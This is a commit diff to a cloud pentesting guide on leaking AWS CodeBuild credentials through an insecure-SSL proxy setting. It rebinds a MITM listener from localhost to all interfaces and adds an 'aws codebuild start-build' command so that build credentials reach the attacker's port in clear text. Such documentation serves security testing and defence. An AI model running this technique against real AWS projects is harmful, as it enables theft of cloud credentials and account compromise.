Merge pull request #129 from RealFakeAccount/fix-AWS-Codebuild-Token-Leakage-Via-insecureSSL

Update aws-codebuild-token-leakage.md
2025-12-20 22:34:00 -08:00 · 2024-12-26 23:48:19 +01:00
parent 3e7a160eed 68c0d44a27
commit 90b6121d75
1 changed files with 8 additions and 2 deletions
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
@@ -149,7 +149,7 @@ aws codebuild update-project --name <proj-name> \
 from mitm import MITM, protocol, middleware, crypto

 mitm = MITM(
-    host="127.0.0.1",
+    host="0.0.0.0",
    port=4444,
    protocols=[protocol.HTTP], 
    middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
@@ -158,7 +158,13 @@ mitm = MITM(
 mitm.run()
 ```

-* Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+* Next, click on **Build the project** or start the build from command line:
+
+```sh
+aws codebuild start-build --project-name <proj-name>
+```
+
+* Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port:

 <figure><img src="../../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>